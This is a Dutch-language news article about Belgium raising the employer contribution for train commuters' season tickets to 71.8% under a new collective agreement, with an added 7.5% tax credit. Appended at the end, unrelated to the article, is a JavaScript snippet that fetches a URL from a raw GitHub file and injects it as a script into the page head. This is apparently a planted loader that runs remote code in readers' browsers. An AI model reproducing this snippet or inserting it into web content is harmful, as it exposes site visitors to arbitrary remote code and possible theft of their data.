Nadat begin dit jaar al de fietsvergoedingen voor woon-werkverplaatsingen werden opgetrokken, zal vanaf 1 juni ook de werkgeverstussenkomst voor treinpendelaars stijgen, van 56 naar 71,8%. Maandag werd in de Nationale Arbeidsraad een nieuwe collectieve arbeidsovereenkomst in die zin afgesloten (CAO 19/11, ter vervanging van 19/9). Daarbovenop kent de overheid de bedrijven een belastingkrediet van 7,5% toe, dankzij een voorstel van federaal mobiliteitsminister George Gilkinet (Ecolo) dat eerder werd goedgekeurd in de Kern.
Ook voor flexabonnementen
Zo’n 100.000 werknemers zullen hierdoor nog slechts 20,7% van hun treinabonnement uit eigen zak moeten betalen (71,8 + 7,5%), in plaats van 44% voordien. Bovendien staat het de sociale partners vrij om regelingen uit te werken die nog gunstiger zijn voor de werknemers. De nieuwe CAO geldt bovendien ook voor zogenaamde flexabonnementen, die in het leven werden geroepen voor mensen die regelmatig telewerken en dus niet elke (werk)dag pendelen.
Het doel is uiteraard om werknemers aan te moedigen de trein te nemen naar hun werk en om de tariefverhogingen van bijna 6% die de NMBS eerder dit jaar doorvoerde, te verzachten. Voor wie al geniet van het derdebetalersysteem (waarbij 80% van een NMBS-abonnement wordt betaald door de werkgever en de overige 20% door de overheid), verandert er niets. (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)